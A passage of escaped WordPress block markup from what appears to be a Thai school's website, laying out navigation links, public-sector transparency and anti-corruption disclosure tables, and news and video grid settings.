data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม  No Gift Policy</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1052\" data-type=\"page\" data-id=\"1052\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout 